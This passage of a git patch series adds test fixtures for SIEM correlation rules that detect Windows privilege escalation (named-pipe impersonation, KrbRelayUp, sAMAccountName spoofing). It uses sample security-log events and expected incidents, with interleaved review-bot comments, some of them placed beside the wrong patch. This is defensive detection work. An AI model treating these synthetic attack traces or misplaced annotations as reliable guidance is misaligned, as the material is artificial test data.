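rule, pinning it here locks the artifact into the test.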
@@ -0,0 +1,6 @@
+{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8961838Z\"},\"EventRecordID\":\"42239824\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"2460\"},\"Channel\":\"Security\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"},{\"Name\":\"SubjectUserName\",\"text\":\"yfomina\"},{\"Name\":\"SubjectDomainName\",\"text\":\"TESTLAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x48f85a9\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"::1\"},{\"Name\":\"IpPort\",\"text\":\"55676\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"0029482318be6784\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win10x64-133.testlab.esc", "dst.host": "win10x64-133.testlab.esc", "dst.hostname": "win10x64-133", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\0029482318be6784", "object.name": "0029482318be6784", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\0029482318be6784", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "0029482318be6784", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "src.host": "::1", "src.ip": "::1", "src.port": 55676, "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "yfomina", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "76514729", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.896Z", "type": "raw", "uuid": "2ecd866e-b08f-4694-aa9c-365d043b0538"}
+{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8964310Z\"},\"EventRecordID\":\"90395393\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:08:40.887\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ea50-6454-eb03-000000000000}\"},{\"Name\":\"ProcessId\",\"text\":\"4\"},{\"Name\":\"PipeName\",\"text\":\"\\\\0029482318be6784\"},{\"Name\":\"Image\",\"text\":\"System\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "0029482318be6784", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "system", "subject.process.guid": "b56fc2d9-ea50-6454-eb03-000000000000", "subject.process.id": "4", "subject.process.name": "system", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.887Z", "type": "raw", "uuid": "bf1cf59f-425f-457c-9457-7a8b36129c91"}
+{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8784795Z\"},\"EventRecordID\":\"90395390\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:08:40.869\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\0029482318be6784\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "0029482318be6784", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.869Z", "type": "raw", "uuid": "5bbddf39-aba6-4054-9c85-6125dfca64dc"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.storage.fullpath": "\\0029482318be6784", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "0029482318be6784", "object.storage.path": "\\", "reason": "Named Pipe Impersonation (RPCSS variant)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"}
From faf81f889723a124df39c4fe5cd9349183847153 Mon Sep 17 00:00:00 2001
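Review bot: The three events are fed in reverse chronological order — the 5145 IPC$ access stamped `2023-05-17T12:08:40.896Z` comes first, the SYSTEM ConnectPipe (`.887Z`) second and the installer.exe CreatePipe (`.869Z`) last — yet the expect still requires one escalate event. If the rule depends on CreatePipe preceding ConnectPipe, this fixture does not show that the in-order case works, and if the reversed order is meant to exercise out-of-order delivery that intent is not recorded anywhere. Either add a fixture with the events in `time` order or state the intent in the comment line, e.g. `# Events are deliberately fed newest-first to check the rule tolerates out-of-order arrival`.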
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Wed, 2 Aug 2023 10:34:04 +0300
Subject: [PATCH 50/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Potential=5FPrivileged?= =?UTF-8?q?=5FEscalation=5Fvia=5FKrbRelayUp)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../tests/test_1.sc | 4 ++++
 1 file changed, 4 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc
new file mode 100644
index 00000000..fa28ebdb
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc
@@ -0,0 +1,4 @@
+{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-04-25T22:17:47.0581723Z\"},\"EventRecordID\":\"72742\",\"Correlation\":{\"ActivityID\":\"{6c67e3ee-58ed-0002-0de4-676ced58d801}\"},\"Execution\":{\"ProcessID\":\"680\",\"ThreadID\":\"768\"},\"Channel\":\"Security\",\"Computer\":\"02694w-win10.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"SubjectUserName\",\"text\":\"-\"},{\"Name\":\"SubjectDomainName\",\"text\":\"-\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x0\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"THREEBEESCO.COM\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x8a38de\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Kerberos\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Kerberos\"},{\"Name\":\"WorkstationName\",\"text\":\"-\"},{\"Name\":\"LogonGuid\",\"text\":\"{35d5e180-95bd-9ed7-7efe-c355d7215a87}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x0\"},{\"Name\":\"ProcessName\",\"text\":\"-\"},{\"Name\":\"IpAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"IpPort\",\"text\":\"50163\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboundUserName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "6c67e3ee-58ed-0002-0de4-676ced58d801", "datafield6": "Network", "datafield9": "Kerberos", "dst.fqdn": "02694w-win10.threebeesco.com", "dst.host": "02694w-win10.threebeesco.com", "dst.hostname": "02694w-win10", "event_src.category": "AAA", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:59:37.461Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 50163, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "9058526", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-04-25T22:17:47.058Z", "type": "raw", "uuid": "ab2f9c44-31a2-4cef-ac4e-34a421a9c792"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Valid Accounts", "correlation_name": "Potential_Privileged_Escalation_via_KrbRelayUp", "correlation_type": "incident", "dst.fqdn": "02694w-win10.threebeesco.com", "dst.host": "02694w-win10.threebeesco.com", "dst.hostname": "02694w-win10", "event_src.category": "AAA", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "Undefined", "incident.severity": "high", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 50163, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "9058526"}
From e3deb0f18eb9cbea7a0062c671149cc20e8312d8 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Wed, 2 Aug 2023 10:38:02 +0300
Subject: [PATCH 51/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(sAMAccountName=5F?= =?UTF-8?q?Spoofing)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../sAMAccountName_Spoofing/tests/test_1.sc | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc
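Review bot: The fixture holds only the positive case — one 4624 with LogonType 3, Kerberos, target Administrator, IpAddress 127.0.0.1 and ElevatedToken %%1842 — and expects one incident, so nothing demonstrates what keeps the rule from firing on an ordinary Kerberos network logon by an administrator (presumably the loopback source and/or the elevated token, which cannot be confirmed from this hunk). A companion negative test — the same event with a non-loopback IpAddress, or with ElevatedToken %%1843 — would pin the discriminating condition. The expected event also pins `"incident.category": "Undefined"`, which reads like a placeholder in the rule's output and is worth confirming before the test locks it in.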
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc new file mode 100644 index 00000000..7a3f1e99 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc 
@@ -0,0 +1,5 @@
+{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4742\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13825\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-12-12T17:57:52.4994283Z\"},\"EventRecordID\":\"2982098\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2456\"},\"Channel\":\"Security\",\"Computer\":\"dc012.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ComputerAccountChange\",\"text\":\"-\"},{\"Name\":\"TargetUserName\",\"text\":\"DC012\"},{\"Name\":\"TargetDomainName\",\"text\":\"3B\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220105\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-101606\"},{\"Name\":\"SubjectUserName\",\"text\":\"lgrove\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x738cf9\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"DC012\"},{\"Name\":\"DisplayName\",\"text\":\"-\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"-\"},{\"Name\":\"HomePath\",\"text\":\"-\"},{\"Name\":\"ScriptPath\",\"text\":\"-\"},{\"Name\":\"ProfilePath\",\"text\":\"-\"},{\"Name\":\"UserWorkstations\",\"text\":\"-\"},{\"Name\":\"PasswordLastSet\",\"text\":\"-\"},{\"Name\":\"AccountExpires\",\"text\":\"-\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"-\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"-\"},{\"Name\":\"NewUacValue\",\"text\":\"-\"},{\"Name\":\"UserAccountControl\",\"text\":\"-\"},{\"Name\":\"UserParameters\",\"text\":\"-\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\"-\"},{\"Name\":\"DnsHostName\",\"text\":\"-\"},{\"Name\":\"ServicePrincipalNames\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield2": "-", "event_src.category": "Directory service", "event_src.fqdn": "dc012.threebeesco.com", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4742_A_computer_account_was_changed", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4742", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "object.account.name": "dc012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T19:34:20.525Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-101606", "subject.account.name": "lgrove", "subject.account.session_id": "7572729", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-12-12T17:57:52.499Z", "type": "raw", "uuid": "4bcc4136-497e-47e8-a24c-bb0db1a0079d"}
+{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4768\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-12-12T17:57:52.5732454Z\"},\"EventRecordID\":\"2982095\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2456\"},\"Channel\":\"Security\",\"Computer\":\"dc012.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"dc012\"},{\"Name\":\"TargetDomainName\",\"text\":\"threebeesco.com\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220105\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt\"},{\"Name\":\"ServiceSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-502\"},{\"Name\":\"TicketOptions\",\"text\":\"0x40800010\"},{\"Name\":\"Status\",\"text\":\"0x0\"},{\"Name\":\"TicketEncryptionType\",\"text\":\"0x17\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"::ffff:172.16.66.19\"},{\"Name\":\"IpPort\",\"text\":\"50615\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "No error", "datafield5": "0x17", "datafield6": "RC4-HMAC", "datafield8": "0x40800010", "datafield9": "S-1-5-21-308926384-506822093-3341789130-502", "event_src.category": "AAA", "event_src.fqdn": "dc012.threebeesco.com", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4768_A_Kerberos_authentication_ticket_was_requested", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4768", "normalized": true, "object": "system", "reason": "0x0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T19:42:21.025Z", "src.host": "172.16.66.19", "src.ip": "172.16.66.19", "src.port": 50615, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "subject.account.name": "dc012", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-12-12T17:57:52.573Z", "type": "raw", "uuid": "f90c9558-8be7-4424-947a-d9822a7045ee"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "modify", "alert.context": "172.16.66.19", "alert.key": "lgrove -> dc012$", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Exploitation for Privilege Escalation", "correlation_name": "sAMAccountName_Spoofing", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "sAMAccountName_Spoofing|dc012.threebeesco.com|s-1-5-21-308926384-506822093-3341789130-101606", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "logon_service": "krbtgt", "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "object.account.name": "dc012", "src.host": "172.16.66.19", "src.ip": "172.16.66.19", "src.port": 50615, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-101606", "subject.account.name": "lgrove", "subject.account.session_id": "7572729"}
From ea3438ad18bdc865a411cbcda3e1e15faa4e39a0 Mon Sep 17 00:00:00 2001 
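Review bot: The comment on the fourth added line, `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь`, is the placeholder from the test scaffold, not a description of this case; now that the expect section is filled in it should be replaced with a one-line summary of the scenario, e.g. `# 4742: lgrove changes computer account sAMAccountName to "DC012" (no trailing $); 4768: TGT requested for dc012 from 172.16.66.19 -> one sAMAccountName_Spoofing incident`. The file covers only the positive path; a second test feeding a 4742 whose SamAccountName keeps the `$` suffix (or a 4768 for an unrelated account) with `expect 0` would pin that the rule stays silent on routine computer-account changes, which is where its false positives would come from. The same leftover template comment is visible in the KrbRelayUp test at the top of this chunk.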
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:53:18 +0300 Subject: [PATCH 52/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B8=D0=BB=20?= =?UTF-8?q?=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89=D0=B8?= =?UTF-8?q?=D0=B5=D1=81=D1=8F=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80=D0=B0?= =?UTF-8?q?=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F?= =?UTF-8?q?=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82?= =?UTF-8?q?=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8?= =?UTF-8?q?=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80?= =?UTF-8?q?=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(UACME=5F23=5FDismCore=5FHijac?= =?UTF-8?q?king)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../UACME_23_DismCore_Hijacking/tests/test_1.sc | 7 ++++--- 